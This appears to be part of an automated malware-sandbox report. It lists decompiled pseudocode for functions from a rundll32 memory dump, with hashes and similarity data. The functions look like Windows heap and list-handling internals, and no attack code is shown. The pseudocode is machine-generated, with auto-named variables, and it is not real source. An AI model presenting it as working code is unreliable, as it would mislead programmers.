                                                                                            0x04656da7
                                                                                            0x04656db1
                                                                                            0x04656db1
                                                                                            0x04656dbb
                                                                                            0x04656dbb
                                                                                            0x04656d90
                                                                                            0x04656d69
                                                                                            0x04656d46
                                                                                            0x04656dc6

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 265f601ef841886c629dba886a13f073a4958b5fd8a091ce1b2f088acb3ec82e
                                                                                            • Instruction ID: 6a836c4028d41051cbcd1567f28efa23879e1a8e741527ae280815f335ee8455
                                                                                            • Opcode Fuzzy Hash: 265f601ef841886c629dba886a13f073a4958b5fd8a091ce1b2f088acb3ec82e
                                                                                            • Instruction Fuzzy Hash: 9721F2725002459BE721DF28C944B6BB7ECAF91744F440A5BFD44C7260F734E909C6A2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 046A070D Relevance: .1, Instructions: 72COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 67%
                                                                                            			E046A070D(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
				char _v8;
				intOrPtr _v11;
				signed int _v12;
				intOrPtr _v15;
				signed int _v16;
				intOrPtr _v28;
				void* __ebx;
				char* _t32;
				signed int* _t38;
				signed int _t60;

				_t38 = __ecx;
				_v16 = __edx;
				_t60 = E046A07DF(__ecx, __edx,  &_a4,  &_a8, 2);
				if(_t60 != 0) {
					_t7 = _t38 + 0x38; // 0x29cd5903
					_push( *_t7);
					_t9 = _t38 + 0x34; // 0x6adeeb00
					_push( *_t9);
					_v12 = _a8 << 0xc;
					_t11 = _t38 + 4; // 0x5de58b5b
					_push(0x4000);
					_v8 = (_a4 << 0xc) + (_v16 - ( *__ecx & _v16) >> 4 <<  *_t11) + ( *__ecx & _v16);
					E0469AFDE( &_v8,  &_v12);
					E046A1293(_t38, _v28, _t60);
					if(E045F7D50() == 0) {
						_t32 = 0x7ffe0380;
					} else {
						_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						_t21 = _t38 + 0x3c; // 0xc3595e5f
						E046914FB(_t38,  *_t21, _v11, _v15, 0xd);
					}
				}
				return  ~_t60;
			}













                                                                                            0x046a071b
                                                                                            0x046a0724
                                                                                            0x046a0734
                                                                                            0x046a0738
                                                                                            0x046a074b
                                                                                            0x046a074b
                                                                                            0x046a0753
                                                                                            0x046a0753
                                                                                            0x046a0759
                                                                                            0x046a075d
                                                                                            0x046a0774
                                                                                            0x046a0779
                                                                                            0x046a077d
                                                                                            0x046a0789
                                                                                            0x046a0795
                                                                                            0x046a07a7
                                                                                            0x046a0797
                                                                                            0x046a07a0
                                                                                            0x046a07a0
                                                                                            0x046a07af
                                                                                            0x046a07c4
                                                                                            0x046a07cd
                                                                                            0x046a07cd
                                                                                            0x046a07af
                                                                                            0x046a07dc

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
                                                                                            • Instruction ID: ee52448bb3605f866e843a8903e757e4c8b62a2a3649cff703724941c88c6405
                                                                                            • Opcode Fuzzy Hash: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
                                                                                            • Instruction Fuzzy Hash: 6521F236204600AFD715DF18C880BAABBE5EBD4754F04856DF9958B381E730ED19CF95
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 045FAE73 Relevance: .1, Instructions: 70COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 96%
                                                                                            			E045FAE73(intOrPtr __ecx, void* __edx) {
				intOrPtr _v8;
				void* _t19;
				char* _t22;
				signed char* _t24;
				intOrPtr _t25;
				intOrPtr _t27;
				void* _t31;
				intOrPtr _t36;
				char* _t38;
				signed char* _t42;

				_push(__ecx);
				_t31 = __edx;
				_v8 = __ecx;
				_t19 = E045F7D50();
				_t38 = 0x7ffe0384;
				if(_t19 != 0) {
					_t22 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				} else {
					_t22 = 0x7ffe0384;
				}
				_t42 = 0x7ffe0385;
				if( *_t22 != 0) {
					if(E045F7D50() == 0) {
						_t24 = 0x7ffe0385;
					} else {
						_t24 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
					}
					if(( *_t24 & 0x00000010) != 0) {
						goto L17;
					} else {
						goto L3;
					}
				} else {
					L3:
					_t27 = E045F7D50();
					if(_t27 != 0) {
						_t27 =  *[fs:0x30];
						_t38 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22a;
					}
					if( *_t38 != 0) {
						_t27 =  *[fs:0x30];
						if(( *(_t27 + 0x240) & 0x00000004) == 0) {
							goto L5;
						}
						_t27 = E045F7D50();
						if(_t27 != 0) {
							_t27 =  *[fs:0x30];
							_t42 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22b;
						}
						if(( *_t42 & 0x00000020) != 0) {
							L17:
							_t25 = _v8;
							_t36 = 0;
							if(_t25 != 0) {
								_t36 =  *((intOrPtr*)(_t25 + 0x18));
							}
							_t27 = E04657794( *((intOrPtr*)(_t31 + 0x18)), _t36,  *((intOrPtr*)(_t31 + 0x94)),  *(_t31 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_t31 + 0x28)));
						}
						goto L5;
					} else {
						L5:
						return _t27;
					}
				}
			}













                                                                                            0x045fae78
                                                                                            0x045fae7c
                                                                                            0x045fae7e
                                                                                            0x045fae81
                                                                                            0x045fae86
                                                                                            0x045fae8d
                                                                                            0x04642691
                                                                                            0x045fae93
                                                                                            0x045fae93
                                                                                            0x045fae93
                                                                                            0x045fae98
                                                                                            0x045fae9d
                                                                                            0x046426a2
                                                                                            0x046426b4
                                                                                            0x046426a4
                                                                                            0x046426ad
                                                                                            0x046426ad
                                                                                            0x046426b9
                                                                                            0x00000000
                                                                                            0x046426bb
                                                                                            0x00000000
                                                                                            0x046426bb
                                                                                            0x045faea3
                                                                                            0x045faea3
                                                                                            0x045faea3
                                                                                            0x045faeaa
                                                                                            0x046426c0
                                                                                            0x046426c9
                                                                                            0x046426c9
                                                                                            0x045faeb3
                                                                                            0x046426d4
                                                                                            0x046426e1
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x046426e7
                                                                                            0x046426ee
                                                                                            0x046426f0
                                                                                            0x046426f9
                                                                                            0x046426f9
                                                                                            0x04642702
                                                                                            0x04642708
                                                                                            0x04642708
                                                                                            0x0464270b
                                                                                            0x0464270f
                                                                                            0x04642711
                                                                                            0x04642711
                                                                                            0x04642725
                                                                                            0x04642725
                                                                                            0x00000000
                                                                                            0x045faeb9
                                                                                            0x045faeb9
                                                                                            0x045faebf
                                                                                            0x045faebf
                                                                                            0x045faeb3

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
                                                                                            • Instruction ID: 437f42a73740f92db2bedb66b2e891ee255c57138e4aeac68ec1bd3c98fa3379
                                                                                            • Opcode Fuzzy Hash: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
                                                                                            • Instruction Fuzzy Hash: 7521C2317016819FEF159B29C954B2577E9BF94784F2900E1EE088B7A2F734FC40D692
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 04657794 Relevance: .1, Instructions: 70COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 82%
                                                                                            			E04657794(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, unsigned int _a8, void* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _t21;
				void* _t24;
				intOrPtr _t25;
				void* _t36;
				short _t39;
				signed char* _t42;
				unsigned int _t46;
				void* _t50;

				_push(__ecx);
				_push(__ecx);
				_t21 =  *0x46c7b9c; // 0x0
				_t46 = _a8;
				_v12 = __edx;
				_v8 = __ecx;
				_t4 = _t46 + 0x2e; // 0x2e
				_t36 = _t4;
				_t24 = L045F4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t21 + 0x180000, _t36);
				_t50 = _t24;
				if(_t50 != 0) {
					_t25 = _a4;
					if(_t25 == 5) {
						L3:
						_t39 = 0x14b1;
					} else {
						_t39 = 0x14b0;
						if(_t25 == 6) {
							goto L3;
						}
					}
					 *((short*)(_t50 + 6)) = _t39;
					 *((intOrPtr*)(_t50 + 0x28)) = _t25;
					_t11 = _t50 + 0x2c; // 0x2c
					 *((intOrPtr*)(_t50 + 0x20)) = _v8;
					 *((intOrPtr*)(_t50 + 0x24)) = _v12;
					E0461F3E0(_t11, _a12, _t46);
					 *((short*)(_t50 + 0x2c + (_t46 >> 1) * 2)) = 0;
					if(E045F7D50() == 0) {
						_t42 = 0x7ffe0384;
					} else {
						_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					_push(_t50);
					_t19 = _t36 - 0x20; // 0xe
					_push(0x403);
					_push( *_t42 & 0x000000ff);
					E04619AE0();
					_t24 = L045F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t50);
				}
				return _t24;
			}













                                                                                            0x04657799
                                                                                            0x0465779a
                                                                                            0x0465779b
                                                                                            0x046577a3
                                                                                            0x046577ab
                                                                                            0x046577ae
                                                                                            0x046577b1
                                                                                            0x046577b1
                                                                                            0x046577bf
                                                                                            0x046577c4
                                                                                            0x046577c8
                                                                                            0x046577ce
                                                                                            0x046577d4
                                                                                            0x046577e0
                                                                                            0x046577e0
                                                                                            0x046577d6
                                                                                            0x046577d6
                                                                                            0x046577de
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x046577de
                                                                                            0x046577e5
                                                                                            0x046577f0
                                                                                            0x046577f3
                                                                                            0x046577f6
                                                                                            0x046577fd
                                                                                            0x04657800
                                                                                            0x0465780c
                                                                                            0x04657818
                                                                                            0x0465782b
                                                                                            0x0465781a
                                                                                            0x04657823
                                                                                            0x04657823
                                                                                            0x04657830
                                                                                            0x04657831
                                                                                            0x04657838
                                                                                            0x0465783d
                                                                                            0x0465783e
                                                                                            0x0465784f
                                                                                            0x0465784f
                                                                                            0x0465785a

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 54556d9fbd117860605c0c39706bae18166845f77cb763cd6cb8537228786297
                                                                                            • Instruction ID: b20af549477abb22dbe07c041dcbec3cf6240c8e0e3ebf08461c0a5f9171cd0d
                                                                                            • Opcode Fuzzy Hash: 54556d9fbd117860605c0c39706bae18166845f77cb763cd6cb8537228786297
                                                                                            • Instruction Fuzzy Hash: 72216F72500604ABC725DF69DC90EABB7A9EF88741F14456DEA0AD7760E634E900CB94
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0460FD9B Relevance: .1, Instructions: 69COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 93%
                                                                                            			E0460FD9B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				intOrPtr _v8;
				void* _t19;
				intOrPtr _t29;
				intOrPtr _t32;
				intOrPtr _t35;
				intOrPtr _t37;
				intOrPtr* _t40;

				_t35 = __edx;
				_push(__ecx);
				_push(__ecx);
				_t37 = 0;
				_v8 = __edx;
				_t29 = __ecx;
				if( *((intOrPtr*)( *[fs:0x18] + 0xfbc)) != 0) {
					_t40 =  *((intOrPtr*)( *[fs:0x18] + 0xfbc));
					L3:
					_t19 = _a4 - 4;
					if(_t19 != 0) {
						if(_t19 != 1) {
							L7:
							return _t37;
						}
						if(_t35 == 0) {
							L11:
							_t37 = 0xc000000d;
							goto L7;
						}
						if( *((intOrPtr*)(_t40 + 4)) != _t37) {
							L045F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37,  *((intOrPtr*)(_t40 + 4)));
							_t35 = _v8;
						}
						 *((intOrPtr*)(_t40 + 4)) = _t35;
						goto L7;
					}
					if(_t29 == 0) {
						goto L11;
					}
					_t32 =  *_t40;
					if(_t32 != 0) {
						 *((intOrPtr*)(_t29 + 0x20)) =  *((intOrPtr*)(_t32 + 0x20));
						E045E76E2( *_t40);
					}
					 *_t40 = _t29;
					goto L7;
				}
				_t40 = L045F4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 8);
				if(_t40 == 0) {
					_t37 = 0xc0000017;
					goto L7;
				}
				_t35 = _v8;
				 *_t40 = 0;
				 *((intOrPtr*)(_t40 + 4)) = 0;
				 *((intOrPtr*)( *[fs:0x18] + 0xfbc)) = _t40;
				goto L3;
			}










                                                                                            0x0460fd9b
                                                                                            0x0460fda0
                                                                                            0x0460fda1
                                                                                            0x0460fdab
                                                                                            0x0460fdad
                                                                                            0x0460fdb0
                                                                                            0x0460fdb8
                                                                                            0x0460fe0f
                                                                                            0x0460fde6
                                                                                            0x0460fde9
                                                                                            0x0460fdec
                                                                                            0x0464c0c0
                                                                                            0x0460fdfe
                                                                                            0x0460fe06
                                                                                            0x0460fe06
                                                                                            0x0464c0c8
                                                                                            0x0460fe2d
                                                                                            0x0460fe2d
                                                                                            0x00000000
                                                                                            0x0460fe2d
                                                                                            0x0464c0d1
                                                                                            0x0464c0e0
                                                                                            0x0464c0e5
                                                                                            0x0464c0e5
                                                                                            0x0464c0e8
                                                                                            0x00000000
                                                                                            0x0464c0e8
                                                                                            0x0460fdf4
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0460fdf6
                                                                                            0x0460fdfa
                                                                                            0x0460fe1a
                                                                                            0x0460fe1f
                                                                                            0x0460fe1f
                                                                                            0x0460fdfc
                                                                                            0x00000000
                                                                                            0x0460fdfc
                                                                                            0x0460fdcc
                                                                                            0x0460fdd0
                                                                                            0x0460fe26
                                                                                            0x00000000
                                                                                            0x0460fe26
                                                                                            0x0460fdd8
                                                                                            0x0460fddb
                                                                                            0x0460fddd
                                                                                            0x0460fde0
                                                                                            0x00000000

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
                                                                                            • Instruction ID: 9fcc7a6830f03c8c4a257abfbc9d1448f64d61ee6193c863ff774b26afc0d6bf
                                                                                            • Opcode Fuzzy Hash: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
                                                                                            • Instruction Fuzzy Hash: E0219872640A41EBD738CF4AC540A63B7E5FBA4B10F21806EE949877A1E771BC01DB80
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 045D9240 Relevance: .1, Instructions: 63COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 77%
                                                                                            			E045D9240(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t33;
				intOrPtr _t37;
				intOrPtr _t41;
				intOrPtr* _t46;
				void* _t48;
				intOrPtr _t50;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr _t62;
				intOrPtr _t65;
				void* _t66;
				void* _t68;

				_push(0xc);
				_push(0x46af708);
				E0462D08C(__ebx, __edi, __esi);
				_t65 = __ecx;
				 *((intOrPtr*)(_t68 - 0x1c)) = __ecx;
				if( *(__ecx + 0x24) != 0) {
					_push( *(__ecx + 0x24));
					E046195D0();
					 *(__ecx + 0x24) =  *(__ecx + 0x24) & 0x00000000;
				}
				L6();
				L6();
				_push( *((intOrPtr*)(_t65 + 0x28)));
				E046195D0();
				_t33 =  *0x46c84c4; // 0x0
				L045F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t33 + 0xc0000,  *((intOrPtr*)(_t65 + 0x10)));
				_t37 =  *0x46c84c4; // 0x0
				L045F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37 + 0xc0000,  *((intOrPtr*)(_t65 + 0x1c)));
				_t41 =  *0x46c84c4; // 0x0
				E045F2280(L045F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t41 + 0xc0000,  *((intOrPtr*)(_t65 + 0x20))), 0x46c86b4);
				 *(_t68 - 4) =  *(_t68 - 4) & 0x00000000;
				_t46 = _t65 + 0xe8;
				_t62 =  *_t46;
				_t60 =  *((intOrPtr*)(_t46 + 4));
				if( *((intOrPtr*)(_t62 + 4)) != _t46 ||  *_t60 != _t46) {
					_t61 = 3;
					asm("int 0x29");
					_push(_t65);
					_t66 = _t61;
					_t23 = _t66 + 0x14; // 0x8df8084c
					_push( *_t23);
					E046195D0();
					_t24 = _t66 + 0x10; // 0x89e04d8b
					_push( *_t24);
					 *(_t66 + 0x38) =  *(_t66 + 0x38) & 0x00000000;
					_t48 = E046195D0();
					 *(_t66 + 0x14) =  *(_t66 + 0x14) & 0x00000000;
					 *(_t66 + 0x10) =  *(_t66 + 0x10) & 0x00000000;
					return _t48;
				} else {
					 *_t60 = _t62;
					 *((intOrPtr*)(_t62 + 4)) = _t60;
					 *(_t68 - 4) = 0xfffffffe;
					E045D9325();
					_t50 =  *0x46c84c4; // 0x0
					return E0462D0D1(L045F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t50 + 0xc0000, _t65));
				}
			}















                                                                                            0x045d9240
                                                                                            0x045d9242
                                                                                            0x045d9247
                                                                                            0x045d924c
                                                                                            0x045d924e
                                                                                            0x045d9255
                                                                                            0x045d9257
                                                                                            0x045d925a
                                                                                            0x045d925f
                                                                                            0x045d925f
                                                                                            0x045d9266
                                                                                            0x045d9271
                                                                                            0x045d9276
                                                                                            0x045d9279
                                                                                            0x045d927e
                                                                                            0x045d9295
                                                                                            0x045d929a
                                                                                            0x045d92b1
                                                                                            0x045d92b6
                                                                                            0x045d92d7
                                                                                            0x045d92dc
                                                                                            0x045d92e0
                                                                                            0x045d92e6
                                                                                            0x045d92e8
                                                                                            0x045d92ee
                                                                                            0x045d9332
                                                                                            0x045d9333
                                                                                            0x045d9337
                                                                                            0x045d9338
                                                                                            0x045d933a
                                                                                            0x045d933a
                                                                                            0x045d933d
                                                                                            0x045d9342
                                                                                            0x045d9342
                                                                                            0x045d9345
                                                                                            0x045d9349
                                                                                            0x045d934e
                                                                                            0x045d9352
                                                                                            0x045d9357
                                                                                            0x045d92f4
                                                                                            0x045d92f4
                                                                                            0x045d92f6
                                                                                            0x045d92f9
                                                                                            0x045d9300
                                                                                            0x045d9306
                                                                                            0x045d9324
                                                                                            0x045d9324

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: 49bfaa22698ac0739434cdda85242418168e20579a023056292b64a1dac3fdfc
                                                                                            • Instruction ID: 1f0ef40242082a61908dbbfa42355d1ebcbe43c9dae2acc1f8872006996f34d5
                                                                                            • Opcode Fuzzy Hash: 49bfaa22698ac0739434cdda85242418168e20579a023056292b64a1dac3fdfc
                                                                                            • Instruction Fuzzy Hash: 26214871051A01DFD721FF68CA00F5AB7B9FF08708F044568A10A976B2DB34F941EB44
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0460B390 Relevance: .1, Instructions: 63COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 54%
                                                                                            			E0460B390(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				signed char _t12;
				signed int _t16;
				signed int _t21;
				void* _t28;
				signed int _t30;
				signed int _t36;
				signed int _t41;

				_push(__ecx);
				_t41 = _a4 + 0xffffffb8;
				E045F2280(_t12, 0x46c8608);
				 *(_t41 + 0x34) =  *(_t41 + 0x34) - 1;
				asm("sbb edi, edi");
				_t36 =  !( ~( *(_t41 + 0x34))) & _t41;
				_v8 = _t36;
				asm("lock cmpxchg [ebx], ecx");
				_t30 = 1;
				if(1 != 1) {
					while(1) {
						_t21 = _t30 & 0x00000006;
						_t16 = _t30;
						_t28 = (0 | _t21 == 0x00000002) * 4 - 1 + _t30;
						asm("lock cmpxchg [edi], esi");
						if(_t16 == _t30) {
							break;
						}
						_t30 = _t16;
					}
					_t36 = _v8;
					if(_t21 == 2) {
						_t16 = E046100C2(0x46c8608, 0, _t28);
					}
				}
				if(_t36 != 0) {
					_t16 = L045F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t36);
				}
				return _t16;
			}











                                                                                            0x0460b395
                                                                                            0x0460b3a2
                                                                                            0x0460b3a5
                                                                                            0x0460b3aa
                                                                                            0x0460b3b2
                                                                                            0x0460b3ba
                                                                                            0x0460b3bd
                                                                                            0x0460b3c0
                                                                                            0x0460b3c4
                                                                                            0x0460b3c9
                                                                                            0x0464a3e9
                                                                                            0x0464a3ed
                                                                                            0x0464a3f0
                                                                                            0x0464a3ff
                                                                                            0x0464a403
                                                                                            0x0464a409
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0464a40b
                                                                                            0x0464a40b
                                                                                            0x0464a40f
                                                                                            0x0464a415
                                                                                            0x0464a423
                                                                                            0x0464a423
                                                                                            0x0464a415
                                                                                            0x0460b3d1
                                                                                            0x0460b3e8
                                                                                            0x0460b3e8
                                                                                            0x0460b3d9

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 336245a48b8962f83f1e9b8d838ae4c79195180063e558b5dc9d3f91bb52d419
                                                                                            • Instruction ID: 0969dfecbf4fcb7f066f3639902dc597d47d099fdbc3ea4df8fc660b920a63c6
                                                                                            • Opcode Fuzzy Hash: 336245a48b8962f83f1e9b8d838ae4c79195180063e558b5dc9d3f91bb52d419
                                                                                            • Instruction Fuzzy Hash: 1E118433301120ABDB2D9E959D80A6B7257EBC5730B38812DEA16C73C0FE31BC02C298
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 04664257 Relevance: .1, Instructions: 60COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 90%
                                                                                            			E04664257(void* __ebx, void* __ecx, intOrPtr* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t18;
				intOrPtr _t24;
				intOrPtr* _t27;
				intOrPtr* _t30;
				intOrPtr* _t31;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr* _t35;
				void* _t37;
				void* _t38;
				void* _t39;
				void* _t43;

				_t39 = __eflags;
				_t35 = __edi;
				_push(8);
				_push(0x46b08d0);
				E0462D08C(__ebx, __edi, __esi);
				_t37 = __ecx;
				E046641E8(__ebx, __edi, __ecx, _t39);
				E045EEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
				 *(_t38 - 4) =  *(_t38 - 4) & 0x00000000;
				_t18 = _t37 + 8;
				_t33 =  *_t18;
				_t27 =  *((intOrPtr*)(_t18 + 4));
				if( *((intOrPtr*)(_t33 + 4)) != _t18 ||  *_t27 != _t18) {
					L8:
					_push(3);
					asm("int 0x29");
				} else {
					 *_t27 = _t33;
					 *((intOrPtr*)(_t33 + 4)) = _t27;
					_t35 = 0x46c87e4;
					_t18 =  *0x46c87e0; // 0x0
					while(_t18 != 0) {
						_t43 = _t18 -  *0x46c5cd0; // 0xffffffff
						if(_t43 >= 0) {
							_t31 =  *0x46c87e4; // 0x0
							_t18 =  *_t31;
							if( *((intOrPtr*)(_t31 + 4)) != _t35 ||  *((intOrPtr*)(_t18 + 4)) != _t31) {
								goto L8;
							} else {
								 *0x46c87e4 = _t18;
								 *((intOrPtr*)(_t18 + 4)) = _t35;
								L045D7055(_t31 + 0xfffffff8);
								_t24 =  *0x46c87e0; // 0x0
								_t18 = _t24 - 1;
								 *0x46c87e0 = _t18;
								continue;
							}
						}
						goto L9;
					}
				}
				L9:
				__eflags =  *0x46c5cd0;
				if( *0x46c5cd0 <= 0) {
					L045D7055(_t37);
				} else {
					_t30 = _t37 + 8;
					_t34 =  *0x46c87e8; // 0x0
					__eflags =  *_t34 - _t35;
					if( *_t34 != _t35) {
						goto L8;
					} else {
						 *_t30 = _t35;
						 *((intOrPtr*)(_t30 + 4)) = _t34;
						 *_t34 = _t30;
						 *0x46c87e8 = _t30;
						 *0x46c87e0 = _t18 + 1;
					}
				}
				 *(_t38 - 4) = 0xfffffffe;
				return E0462D0D1(L04664320());
			}















                                                                                            0x04664257
                                                                                            0x04664257
                                                                                            0x04664257
                                                                                            0x04664259
                                                                                            0x0466425e
                                                                                            0x04664263
                                                                                            0x04664265
                                                                                            0x04664273
                                                                                            0x04664278
                                                                                            0x0466427c
                                                                                            0x0466427f
                                                                                            0x04664281
                                                                                            0x04664287
                                                                                            0x046642d7
                                                                                            0x046642d7
                                                                                            0x046642da
                                                                                            0x0466428d
                                                                                            0x0466428d
                                                                                            0x0466428f
                                                                                            0x04664292
                                                                                            0x04664297
                                                                                            0x0466429c
                                                                                            0x046642a0
                                                                                            0x046642a6
                                                                                            0x046642a8
                                                                                            0x046642ae
                                                                                            0x046642b3
                                                                                            0x00000000
                                                                                            0x046642ba
                                                                                            0x046642ba
                                                                                            0x046642bf
                                                                                            0x046642c5
                                                                                            0x046642ca
                                                                                            0x046642cf
                                                                                            0x046642d0
                                                                                            0x00000000
                                                                                            0x046642d0
                                                                                            0x046642b3
                                                                                            0x00000000
                                                                                            0x046642a6
                                                                                            0x0466429c
                                                                                            0x046642dc
                                                                                            0x046642dc
                                                                                            0x046642e3
                                                                                            0x04664309
                                                                                            0x046642e5
                                                                                            0x046642e5
                                                                                            0x046642e8
                                                                                            0x046642ee
                                                                                            0x046642f0
                                                                                            0x00000000
                                                                                            0x046642f2
                                                                                            0x046642f2
                                                                                            0x046642f4
                                                                                            0x046642f7
                                                                                            0x046642f9
                                                                                            0x04664300
                                                                                            0x04664300
                                                                                            0x046642f0
                                                                                            0x0466430e
                                                                                            0x0466431f

